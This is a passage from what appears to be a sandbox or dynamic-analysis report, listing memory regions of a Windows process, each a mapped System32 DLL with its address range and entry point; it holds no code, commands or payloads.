"\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1785 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1786 start_va = 0x7ffa08a10000 end_va = 0x7ffa08a4ffff monitored = 0 entry_point = 0x7ffa08a1cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1787 start_va = 0x7ffa08a50000 end_va = 0x7ffa08a96fff monitored = 0 entry_point = 0x7ffa08a51d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1788 start_va = 0x7ffa08ae0000 end_va = 0x7ffa08b21fff monitored = 0 entry_point = 0x7ffa08ae3670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1789 start_va = 0x7ffa08e00000 end_va = 0x7ffa08e1efff monitored = 0 entry_point = 0x7ffa08e037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1790 start_va = 0x7ffa08e20000 end_va = 0x7ffa08e98fff monitored = 0 entry_point = 0x7ffa08e276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1791 start_va = 0x7ffa08eb0000 end_va = 0x7ffa08eeffff monitored = 0 entry_point = 0x7ffa08ec6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1792 start_va = 0x7ffa08f10000 end_va = 0x7ffa08f27fff monitored = 0 entry_point = 0x7ffa08f14e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1793 start_va = 0x7ffa08f30000 end_va = 0x7ffa08f54fff monitored = 0 entry_point = 0x7ffa08f35ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1794 start_va = 0x7ffa08f60000 end_va = 0x7ffa090e1fff monitored = 0 entry_point = 0x7ffa08f782a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1795 start_va = 0x7ffa090f0000 end_va = 0x7ffa09192fff monitored = 0 entry_point = 0x7ffa090f2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1796 start_va = 0x7ffa091a0000 end_va = 0x7ffa091f1fff monitored = 0 entry_point = 0x7ffa091a5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1797 start_va = 0x7ffa09200000 end_va = 0x7ffa0922dfff monitored = 1 entry_point = 0x7ffa09202300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1798 start_va = 0x7ffa09230000 end_va = 0x7ffa0928dfff monitored = 0 entry_point = 0x7ffa09235080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1799 start_va = 0x7ffa09290000 end_va = 0x7ffa092affff monitored = 0 entry_point = 0x7ffa09291f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1800 start_va = 0x7ffa092b0000 end_va = 0x7ffa092b8fff monitored = 0 entry_point = 0x7ffa092b18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1801 start_va = 0x7ffa092c0000 end_va = 0x7ffa092d0fff monitored = 0 entry_point = 0x7ffa092c1d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1802 start_va = 0x7ffa09330000 end_va = 0x7ffa09347fff monitored = 0 entry_point = 0x7ffa09332000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1803 start_va = 0x7ffa09350000 end_va = 0x7ffa09390fff monitored = 0 entry_point = 0x7ffa09353750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1804 start_va = 0x7ffa09430000 end_va = 0x7ffa0947bfff monitored = 0 entry_point = 0x7ffa09445310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1805 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1806 start_va = 0x7ffa09510000 end_va = 0x7ffa0954bfff monitored = 0 entry_point = 0x7ffa09516aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1807 start_va = 0x7ffa09c80000 end_va = 0x7ffa09c88fff monitored = 0 entry_point = 0x7ffa09c821d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1808 start_va = 0x7ffa09c90000 end_va = 0x7ffa09cc4fff monitored = 0 entry_point = 0x7ffa09c9a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1809 start_va = 0x7ffa0a560000 end_va = 0x7ffa0a652fff monitored = 0 entry_point = 0x7ffa0a585d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1810 start_va = 0x7ffa0ac50000 end_va = 0x7ffa0ac59fff monitored = 0 entry_point = 0x7ffa0ac514c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1811 start_va = 0x7ffa0afc0000 end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1812 start_va = 0x7ffa0b050000 end_va = 0x7ffa0b06afff monitored = 0 entry_point = 0x7ffa0b051040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1813 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1814 start_va = 0x7ffa0b320000 end_va = 0x7ffa0b32dfff monitored = 0 entry_point = 0x7ffa0b321460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1815 start_va = 0x7ffa0b330000 end_va = 0x7ffa0b33bfff monitored = 0 entry_point = 0x7ffa0b332830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1816 start_va = 0x7ffa0b340000 end_va = 0x7ffa0b34ffff monitored = 0 entry_point = 0x7ffa0b341700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1817 start_va = 0x7ffa0b350000 end_va = 0x7ffa0b358fff monitored = 0 entry_point = 0x7ffa0b351ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1818 start_va = 0x7ffa0b360000 end_va = 0x7ffa0b38cfff monitored = 0 entry_point = 0x7ffa0b362290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1819 start_va = 0x7ffa0b390000 end_va = 0x7ffa0b3e1fff monitored = 0 entry_point = 0x7ffa0b3938e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1820 start_va = 0x7ffa0b4a0000 end_va = 0x7ffa0b4b4fff monitored = 0 entry_point = 0x7ffa0b4a3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1821 start_va = 0x7ffa0b4c0000 end_va = 0x7ffa0b559fff monitored = 0 entry_point = 0x7ffa0b4dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1822 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1823 start_va = 0x7ffa0b6e0000 end_va = 0x7ffa0b6f7fff monitored = 0 entry_point = 0x7ffa0b6e1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1824 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1825 start_va = 0x7ffa0b800000 end_va = 0x7ffa0b8bffff monitored = 0 entry_point = 0x7ffa0b82fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1826 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1827 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1828 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1829 start_va = 0x7ffa0bbe0000 end_va = 0x7ffa0bc8dfff monitored = 0 entry_point = 0x7ffa0bbf80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1830 start_va = 0x7ffa0bc90000 end_va = 0x7ffa0bca1fff monitored = 0 entry_point = 0x7ffa0bc99260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1831 start_va = 0x7ffa0bcb0000 end_va = 0x7ffa0bd60fff monitored = 0 entry_point = 0x7ffa0bd288b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1832 start_va = 0x7ffa0bd70000 end_va = 0x7ffa0bd83fff monitored = 0 entry_point = 0x7ffa0bd72d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1833 start_va = 0x7ffa0bda0000 end_va = 0x7ffa0bda7fff monitored = 0 entry_point = 0x7ffa0bda13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1834 start_va = 0x7ffa0c070000 end_va = 0x7ffa0c102fff monitored = 0 entry_point = 0x7ffa0c079680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1835 start_va = 0x7ffa0c2b0000 end_va = 0x7ffa0c2d4fff monitored = 0 entry_point = 0x7ffa0c2c2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1836 start_va = 0x7ffa0c2e0000 end_va = 0x7ffa0c2f0fff monitored = 0 entry_point = 0x7ffa0c2e7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1837 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1838 start_va = 0x7ffa0ca80000 end_va = 0x7ffa0ca99fff monitored = 0 entry_point = 0x7ffa0ca82cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1839 start_va = 0x7ffa0ce40000 end_va = 0x7ffa0d1c1fff monitored = 0 entry_point = 0x7ffa0ce91220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1840 start_va = 0x7ffa0e2c0000 end_va = 0x7ffa0e3cdfff monitored = 0 entry_point = 0x7ffa0e30eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1841 start_va = 0x7ffa0e440000 end_va = 0x7ffa0e453fff monitored = 0 entry_point = 0x7ffa0e442a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1842 start_va = 0x7ffa0e460000 end_va = 0x7ffa0e471fff monitored = 0 entry_point = 0x7ffa0e461a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1843 start_va = 0x7ffa0e6d0000 end_va = 0x7ffa0e724fff monitored = 0 entry_point = 0x7ffa0e6d3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1844 start_va = 0x7ffa0e730000 end_va = 0x7ffa0e766fff monitored = 0 entry_point = 0x7ffa0e736020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1845 start_va = 0x7ffa0e770000 end_va = 0x7ffa0e78ffff monitored = 0 entry_point = 0x7ffa0e7739a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1846 start_va = 0x7ffa0e790000 end_va = 0x7ffa0e7a6fff monitored = 0 entry_point = 0x7ffa0e795630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1847 start_va = 0x7ffa0e7b0000 end_va = 0x7ffa0e7c2fff monitored = 0 entry_point = 0x7ffa0e7b57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1848 start_va = 0x7ffa0e7d0000 end_va = 0x7ffa0e849fff monitored = 0 entry_point = 0x7ffa0e7f7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1849 start_va = 0x7ffa0e850000 end_va = 0x7ffa0e87dfff monitored = 0 entry_point = 0x7ffa0e857550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1850 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1851 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1852 start_va = 0x7ffa0ead0000 end_va = 0x7ffa0eb10fff monitored = 0 entry_point = 0x7ffa0ead4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1853 start_va = 0x7ffa0eb20000 end_va = 0x7ffa0eb2bfff monitored = 0 entry_point = 0x7ffa0eb214d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1854 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1855 start_va = 0x7ffa0ec70000 end_va = 0x7ffa0ed55fff monitored = 0 entry_point = 0x7ffa0ec8cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1856 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1857 start_va = 0x7ffa0ee30000 end_va = 0x7ffa0ee90fff monitored = 0 entry_point = 0x7ffa0ee34b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1858 start_va = 0x7ffa0eea0000 end_va = 0x7ffa0f01bfff monitored = 0 entry_point = 0x7ffa0eef1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1859 start_va = 0x7ffa0f020000 end_va = 0x7ffa0f02afff monitored = 0 entry_point = 0x7ffa0f021770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1860 start_va = 0x7ffa0f030000 end_va = 0x7ffa0f06dfff monitored = 0 entry_point = 0x7ffa0f03a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1861 start_va = 0x7ffa0f070000 end_va = 0x7ffa0f096fff monitored = 0 entry_point = 0x7ffa0f073bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1862 start_va = 0x7ffa0f0a0000 end_va = 0x7ffa0f0e9fff monitored = 0 entry_point = 0x7ffa0f0aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 1863 start_va = 0x7ffa0f0f0000 end_va = 0x7ffa0f144fff monitored = 0 entry_point = 0x7ffa0f0ffc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1864 start_va = 0x7ffa0f190000 end_va = 0x7ffa0f221fff monitored = 0 entry_point = 0x7ffa0f1da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1865 start_va = 0x7ffa0f2b0000 end_va = 0x7ffa0f2bcfff monitored = 0 entry_point = 0x7ffa0f2b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1866 start_va = 0x7ffa0f2d0000 end_va = 0x7ffa0f2dffff monitored = 0 entry_point = 0x7ffa0f2d2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1867 start_va = 0x7ffa0f2e0000 end_va = 0x7ffa0f2ecfff monitored = 0 entry_point = 0x7ffa0f2e2ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1868 start_va = 0x7ffa0f2f0000 end_va = 0x7ffa0f31efff monitored = 0 entry_point = 0x7ffa0f2f8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1869 start_va = 0x7ffa0f370000 end_va = 0x7ffa0f3ddfff monitored = 0 entry_point = 0x7ffa0f377f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1870 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1871 start_va = 0x7ffa0f430000 end_va = 0x7ffa0f465fff monitored = 0 entry_point = 0x7ffa0f440070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1872 start_va = 0x7ffa0fc30000 end_va = 0x7ffa0fc70fff monitored = 0 entry_point = 0x7ffa0fc47eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1873 start_va = 0x7ffa0fc80000 end_va = 0x7ffa0fd7bfff monitored = 0 entry_point = 0x7ffa0fcb6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1874 start_va = 0x7ffa0fe10000 end_va = 0x7ffa0fecefff monitored = 0 entry_point = 0x7ffa0fe31c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1875 start_va = 0x7ffa0ff20000 end_va = 0x7ffa0ff29fff monitored = 0 entry_point = 0x7ffa0ff21660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1876 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1877 start_va = 0x7ffa0ff50000 end_va = 0x7ffa1009cfff monitored = 0 entry_point = 0x7ffa0ff93da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1878 start_va = 0x7ffa10cc0000 end_va = 0x7ffa11152fff monitored = 0 entry_point = 0x7ffa10ccf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1879 start_va = 0x7ffa11160000 end_va = 0x7ffa111c6fff monitored = 0 entry_point = 0x7ffa1117e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1880 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1881 start_va = 0x7ffa113b0000 end_va = 0x7ffa113cbfff monitored = 0 entry_point = 0x7ffa113b37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1882 start_va = 0x7ffa113d0000 end_va = 0x7ffa113dafff monitored = 0 entry_point = 0x7ffa113d1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1883 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1884 start_va = 0x7ffa114c0000 end_va = 0x7ffa114c9fff monitored = 0 entry_point = 0x7ffa114c1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1885 start_va = 0x7ffa11540000 end_va = 0x7ffa1155efff monitored = 0 entry_point = 0x7ffa11544960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1886 start_va = 0x7ffa11560000 end_va = 0x7ffa1157cfff monitored = 0 entry_point = 0x7ffa11564f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1887 start_va = 0x7ffa11580000 end_va = 0x7ffa115f8fff monitored = 0 entry_point = 0x7ffa1159fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1888 start_va = 0x7ffa11600000 end_va = 0x7ffa11607fff monitored = 0 entry_point = 0x7ffa116013e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1889 start_va = 0x7ffa11640000 end_va = 0x7ffa1167ffff monitored = 0 entry_point = 0x7ffa11651960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1890 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1891 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = 